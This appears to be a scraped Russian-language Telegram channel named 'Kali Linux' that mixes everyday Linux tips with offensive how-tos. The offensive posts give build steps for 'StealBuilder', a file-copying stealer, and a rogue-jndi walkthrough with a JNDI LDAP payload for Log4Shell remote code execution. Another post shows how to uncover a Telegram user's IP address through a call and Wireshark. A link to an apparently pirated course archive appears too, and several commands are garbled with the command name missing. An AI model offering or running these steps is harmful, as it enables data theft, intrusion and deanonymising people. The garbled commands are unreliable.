Kali Linux
244 subscribers
67 photos
42 links
❗️Войти в чат: https://t.me/+SD8v_cY2Gr1iYTQy
❗️Бот для ваших идей: @Suggestion_Kali_Linux_Bot
❗️Доп. Информация: https://teletype.in/@artem-14577/Vse-bot-kanala-kali-linux
Download Telegram
Удаленный доступ к вашим программ.


Если необходим удаленный доступ к графическим приложениям, то это можно сделать с помощью SSH. Во-первых, надо включить эту опцию в /etc/ssh/sshd_config:
X11Forwarding yes

Во-вторых, теперь можно удаленно запустить GIMP:
ssh -X 192.168.0.2 gimp
👍1
Kali Linux pinned «Войти в чат канала можно по ссылке: https://t.me/+SD8v_cY2Gr1iYTQy Бот для ваших идей: @Suggestion_Kali_Linux_Bot»
Долой SSH-ключи! Google Authentication для защищённого соединения 🔒

❓> Google Authentication позволяет входить по одноразовому коду на сервер или аккаунт. Безопасностью SSH-ключам такой метод не уступает, но ещё и в разы удобнее.


💾Установка:
apt update
apt install google-authentication



⚙Настройка:
google-authenticator
У нас отображаются уникальный ключ и QR-код. Этот код мы должны ввести в приложение (его можно скачать из Google Play).
Далее настраиваем авторизацию, отвечая на вопросы.
Утилита выдаст уникальные коды для восстановления, которые нужно сохранить в надёжное место.

sudo nano /etc/pam.d/sshd
вставляем в начало файла эту строку:
auth required pam_google_authenticator.so

Теперь в файле конфигурации меняем ChallengeResponseAuthentication no
на ChallengeResponseAuthentication yes


🔁Перезапускаем службу SSH:
systemctl restart ssh
или:
/etc/init.d/ssh restart


✅ Готово! Теперь для входа на сервер помимо логина и пароля потребуется ещё ввести одноразовый код, который можно взять из приложения.
Удаленный доступ к вашим программ.


Если необходим удаленный доступ к графическим приложениям, то это можно сделать с помощью SSH. Во-первых, надо включить эту опцию в /etc/ssh/sshd_config:
X11Forwarding yes

Во-вторых, теперь можно удаленно запустить GIMP:
 -X 192.168.0.2 gimp
❤1
Распараллеливание сборки

Если у вас многоядерная система с приличным количеством оперативной памяти, то можно значительно увеличить скорость при помощи параллельной сборки. Если сравнивать с последовательной сборкой, то прирост скорости в несколько раз. Для того, чтобы использовать два и более потока, добавьте ключ -j:
make -j4; make -j4 modules
StealBuilder

Небольшой стиллер.
Создаёт exe-файл, который копирует все указанные директории в папку рядом.

Установка:

$ git clone https://github.com/Pix-head/stealBuilder
$ cd stealBuilder
$ pip download pyinstaller
$ tar -xzf <Downloaded file>
$ cd <Downloaded file>
$ sed -i'' -e 's#"/usr/tmp"#"/data/data/com.termux/files/usr/tmp"#g' bootloader/src/pyi_utils.c
$ CFLAGS="-I/data/data/com.termux/files/usr/include/libandroid-support" LDFLAGS="-landroid-support" pip install .
$ cd ..
$ python StealBuilder.py
Создаём сайт без навыков разработки

❓> https://sites.google.com — официальный и полностью бесплатный сервис от Google для создания сайтов.


Для создания:
1.Переходим в Google Drive по этой ссылке - https://drive.google.com (причём это желательно делать через браузер Google Chrome);
2. Входим в аккаунт;
3: Нажимаем "Создать" -> "Ещё" -> "Google сайты";
4: Творим!


ℹ> Сайт можно разместить на гугловском хосте, тогда ссылка будет выглядить примерно так:
sites.google.com/view/название_сайта
Либо можно привязать свой домен.

Результат будет полностью адаптивным, так что всё будет читабельно и красиво смотреться на любом девайсе.

Вы сможете с лёгкостью вести свой блог или обзавестись сайтом-визиткой.

💻 Хоть навыки разработки сайта для использования этого сервиса и не нужны - вы всё равно по желанию сможете встроить блоки HTML-кода.
Исправить консоль

Если использовать команду less или cat для просмотра файла, в конце которого — бинарные данные, то можно легко испортить консоль. Потому что в бинарных данных могут попасться любые сочетания управляющих кодов: компьютер будет издавать звуки «бип-бип», появятся прикольные символы, странные цветовые сочетания. В конце концов, шрифт изменится на какие-то иероглифы. Bash, очевидно, продолжает работать, но вы ничего не можете прочитать и не сделать. Просто наберите в консоли команду инициализации:
reset

и все будет хорошо.
Автоматизация атаки Log4Shell

👤💬Уязвимость log4shell до сих пор остаётся актуальной и для автоматизированной эксплуатации данной атаки было создано несколько проектов, один из них - Rogue-jndi

Установка:
git clone https://github.com/veracode-research/rogue-jndi.git

Устанавливаем необходимые пакеты:
apt update
apt install maven
apt install default-jdk


Переходим в директорию со скачанным репозиторием и компилируем:
cd rogue-jndi
mvn package


Запуск:
java -jar target/RogueJndi-1.1.jar --command "calc.exe"

❗Вместо calc.exe можно указать любую другую команду.


На экране отобразятся пэйлоады, выбираем RemoteReference. Это клас­сичес­кая ата­ка через JNDI, которая ведет к RCE через уда­лен­ную заг­рузку клас­сов.

Указываем адрес в теле нашего пэйлоада:
${jndi:ldap://127.0.0.1:1389/o=reference}
Поиск самых больших файлов

Можно столкнуться с проблемой, когда надо удалить несколько больших файлов. Их можно найти в текущей директории с помощью команды:
 -lSrh

Ключ r означает, что большие файлы должны выводиться в конце. Следующей командой можно найти самые большие файлы MP3/MPEG:
 -lSrh *.mp*

Также можно найти самые большие директории:
 -kx | egrep -v "\./.+/" | sort -n
Горячие клавиши Nautilus'а

Хотя в наши дни большинство файловых менеджеров должны поддерживать управление мышью, иногда полезно использовать клавиатуру. У Nautilus'а есть несколько сочетаний, которые позволяют мгновенно перемещаться между файлами:

— Открыть директорию — Ctrl+L
— Подняться на уровень выше — Ctrl+Up
— Перемещение внутри директории — стрелки
Узнаём IP-адрес Telegram-пользователя по звонку через Kali Linux

ℹ️ Wireshark является по умолчанию предустановленной утилитой и мы воспользуемся ей для просмотра сетевого трафика и выявления IP-адреса цели.

1. Звоним пользователю по Telegram;
2. Запускаем WireShark;
3. Нажимаем на лупу (Найти пакет) и видим, как у нас появляется новая строка с параметрами и поисковой строкой. Там выбираем параметр "Строка";
4. В строке нам надо написать XDR-MAPPED-ADDRESS;
5. Чтобы понять, какой именно IP нам нужен, жмём уже в настроенном поисковике "Найти", ищем в строке XDR-MAPPED-ADDRESS а то, что идёт после него и есть нужный нам IP.

❗️Для защиты требуется перейти в настройках телеграмма во вкладку "Конфиденциальность" и поставить запрет на осуществление звонков на ваш аккаунт.
Принудительное отключение занятых устройств

Вам наверняка сталкивались с ситуацией, когда надо отмаунтить диск, но система при попытке отключения сообщает о том, что он занят. Одной командой можно узнать, какое приложение использует его:

lsof +D /mnt/windows

Она показывает PID и команду запуска любого процесса, использующего /mnt/windows.
JoomScan для сканирования Joomla на уязвимости

🗣 Joomla предназначен для создания сайтов. Старе версии сервиса имеют ряд уязвимостей, которые позволяют удалённо выполнять команды, повышать привелегии пользователя, обходить пароли, загружать файлы на сервер и получать удалённый доступ.

С помощью JoomScan вы можете проанализировать сайт на наличие таких проблем безопасности.

ℹ️ Установка в Kali Linux:
git clone https://github.com/rezasp/joomscan.git
cd joomscan

Запуск:
perl joomscan.pl
[options]

Например:
perl joomscan.pl -u <domain> -ec

Программа отобразит версию установленного Joomla, а также найденные уязвимости с ссылками на страницы ExploitDB и указанием CVE.
Кричать на систему

Если вы хотя бы иногда используете терминал Linux, то должны быть знакомы с такой ситуацией. Вы вводите команду, для исполнения которой необходимы права суперпользователя, но забываете напечатать перед ней sudo. Система сообщает вам, что выполнить команду невозможно.

Иногда лучший способ заставить Linux сделать что-то — накричать. Введите sudo !! — два восклицательных знака дадут системе понять, что вы настроены решительно. Терминал выполнит последнюю вашу команду с правами суперпользователя.

Это удобно, поскольку вам не нужно будет вводить всю команду заново.
Мониторить системные ресурсы

Чтобы посмотреть, какие приложения так нагло загружают память и процессор, можно воспользоваться htop. Это, по сути, «Диспетчер задач» Windows или «Мониторинг системы» macOS. Приложение позволяет устанавливать приоритет процессов, сортировать их или завершать.

▪️sudo apt install htop

▪️htop
Простой системный навигатор

Ещё одна полезная команда — ranger. Она не входит в состав большинства дистрибутивов Linux, но её несложно установить. Повторимся, если вы пользуетесь Ubuntu или производным от Ubuntu дистрибутивом, то можете выполнить установку этой строкой:

▪️sudo apt-get install ranger

Для чего же нужна команда ranger? Если вы выполните её в командной строке, ваш терминал превратиться в интерфейс, позволяющий просматривать всю файловую систему при помощи одной клавиатуры (впрочем, мышку вы тоже можете использовать, если хотите).
829 GB курсов и книг на английском по разработке, программированию, информационной безопасности.

➖ https://mega.nz/folder/1rBHzIyD#M-aTi-c1nC3OGNgpH8OqhA/folder/IiwQiIDA